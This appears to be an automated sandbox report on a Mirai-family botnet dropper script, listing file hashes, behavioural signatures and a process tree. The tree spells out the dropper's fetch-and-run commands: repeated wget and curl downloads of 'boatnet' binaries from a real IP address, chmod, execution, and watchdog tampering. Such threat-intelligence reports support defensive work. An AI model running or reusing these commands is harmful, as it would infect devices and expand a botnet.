Analysis
-
max time kernel
150s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-11-2024 04:06
Static task
static1
Behavioral task
behavioral1
Sample
75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh
-
Size
2KB
-
MD5
7223c9d6dfd0588a042452a35c3eedd5
-
SHA1
3ee35c5d531fccd8bdefb6143429e29575ee47e4
-
SHA256
75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420
-
SHA512
d2f5d60d1f528fa306b856a9dfb35e862b7e3e9db01a6c973cc2b11ed83e7a4e896d6542cd96a3699c3ddadaa8befde862d1205a5350efb047293be59caa898e
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 775 chmod 817 chmod 724 chmod 741 chmod 865 chmod 871 chmod 883 chmod 889 chmod 811 chmod 823 chmod 755 chmod 798 chmod 877 chmod 733 chmod 847 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 726 WTF /tmp/WTF 734 WTF /tmp/WTF 742 WTF /tmp/WTF 757 WTF /tmp/WTF 776 WTF /tmp/WTF 800 WTF /tmp/WTF 812 WTF /tmp/WTF 818 WTF /tmp/WTF 825 WTF /tmp/WTF 848 WTF /tmp/WTF 866 WTF /tmp/WTF 872 WTF /tmp/WTF 878 WTF /tmp/WTF 884 WTF /tmp/WTF 890 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/744/cmdline WTF File opened for reading /proc/758/cmdline WTF File opened for reading /proc/806/cmdline WTF File opened for reading /proc/822/cmdline WTF File opened for reading /proc/856/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/704/cmdline WTF File opened for reading /proc/892/cmdline WTF File opened for reading /proc/457/cmdline WTF File opened for reading /proc/486/cmdline WTF File opened for reading /proc/790/cmdline WTF File opened for reading /proc/793/cmdline WTF File opened for reading /proc/841/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/388/cmdline WTF File opened for reading /proc/320/cmdline WTF File opened for reading /proc/487/cmdline WTF File opened for reading /proc/694/cmdline WTF File opened for reading /proc/737/cmdline WTF File opened for reading /proc/777/cmdline WTF File opened for reading /proc/782/cmdline WTF File opened for reading /proc/803/cmdline WTF File opened for reading /proc/317/cmdline WTF File opened for reading /proc/752/cmdline WTF File opened for reading /proc/762/cmdline WTF File opened for reading /proc/845/cmdline WTF File opened for reading /proc/328/cmdline WTF File opened for reading /proc/725/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/676/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/808/cmdline WTF File opened for reading /proc/868/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/371/cmdline WTF File opened for reading /proc/690/cmdline WTF File opened for reading /proc/773/cmdline WTF File opened for reading /proc/776/cmdline WTF File opened for reading /proc/789/cmdline WTF File opened for reading /proc/689/cmdline WTF File opened for reading /proc/450/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/874/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/696/cmdline WTF File opened for reading /proc/764/cmdline WTF File opened for reading /proc/815/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/767/cmdline WTF File opened for reading /proc/802/cmdline WTF File opened for reading /proc/814/cmdline WTF File opened for reading /proc/820/cmdline WTF File opened for reading /proc/847/cmdline WTF File opened for reading /proc/739/cmdline WTF File opened for reading /proc/745/cmdline WTF File opened for reading /proc/863/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/699/cmdline WTF File opened for reading /proc/785/cmdline WTF File opened for reading /proc/880/cmdline WTF File opened for reading /proc/697/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 728 wget 731 curl 732 cat -
Writes file to tmp directory 29 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.x86_64 wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/WTF 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.x86 wget
Processes
-
/tmp/75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh/tmp/75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh1⤵
- Writes file to tmp directory
PID:697 -
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:703
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/catcat boatnet.x862⤵PID:722
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.x86 systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-UyAA5d WTF2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:726
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.mips boatnet.x86 systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-UyAA5d WTF2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:734
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:738
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:739
-
-
/bin/catcat boatnet.arc2⤵PID:740
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.mips boatnet.x86 systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-UyAA5d WTF2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.i4682⤵PID:744
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/catcat boatnet.i4682⤵PID:754
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 WTF2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.i6862⤵PID:758
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/catcat boatnet.i6862⤵PID:774
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 WTF2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:777
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/catcat boatnet.x86_642⤵PID:797
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:803
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/catcat boatnet.mpsl2⤵PID:810
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:812
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:814
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:815
-
-
/bin/catcat boatnet.arm2⤵PID:816
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:818
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:820
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:821
-
-
/bin/catcat boatnet.arm52⤵PID:822
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:825
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:828
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/catcat boatnet.arm62⤵PID:846
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:848
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/catcat boatnet.arm72⤵PID:864
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:866
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:868
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/catcat boatnet.ppc2⤵PID:870
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:872
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:874
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/catcat boatnet.spc2⤵PID:876
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:878
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:880
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/catcat boatnet.m68k2⤵PID:882
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:884
-
-
/usr/bin/wgetwget http://37.221.93.101/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:886
-
-
/usr/bin/curlcurl -O http://37.221.93.101/hiddenbin/boatnet.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/catcat boatnet.sh42⤵PID:888
-
-
/bin/chmodchmod +x 75f341b14380851a0a0fa06a778281e1306727b8f9c90a81f10381b89609d420.sh boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:890
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD56435daeac1475e26a58bb4a1a1d559f2
SHA184038f6881249b0a485f29424e9cc5c4d623a82d
SHA25627470473f6b873dfcdc2d9394775287286916759db07a55e0ea70b151e9943cc
SHA512d14dc6bba03e413fd9f05ced7de92740f9c4c09d0ea2d2c792a7ee03b21aa39417a73143f562ecbbba99275094f9f72cfd2ad4391527d77e739c2bcd900c9e5f
-
Filesize
105KB
MD58eb17c639b114677199b2a6dd1e7e05c
SHA1b02b3e3cc1f6ea4bb91fd2e7752a3cdc2823139f
SHA25696bd43ec3d867cfe80a85a4db2f9cc9681369d9d90c64828145f900655c489dd
SHA512d54b2ce47a437358d939b0f0d2f2eb46a0a38f101a6144e7644aedee5af8bde3ef6ae35ee9187cb559c78f35628315aea16da31dfe97de15e9f6719559e9b471
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
55KB
MD5e7a4009e7f1e36b5fbe9ea50423cb0cb
SHA18097c404de6facfdf3a8334508adf1428d0831f1
SHA2566eaaf842e5bb5155941b3569bd4bfd6907b9c2875118c52bbce210c267f14866
SHA512249abec36b64b00257f26ed4d925a67589b0f1c0feb9c8c4731f996ebbb1bc209d6fa89fc76170d058f1b24af15e658f64de8192999439ef3ba46e99a8f0a50f
-
Filesize
20KB
MD59989c8ea288da2dddad73db20f372194
SHA106efc879f9c23d099b6716bf9f84ac8666f29e98
SHA2569d780354175a3b406f5764962a3ba7c137961d10005c632db0e7baae9e0b9008
SHA51232ea5c58eb7fac324c88f576c7e05867599e5d3380f8868302a315ecc84427e2f80693386150e3121842a06f15c476224c4f66a1dda4d71d47511a1d7c600de9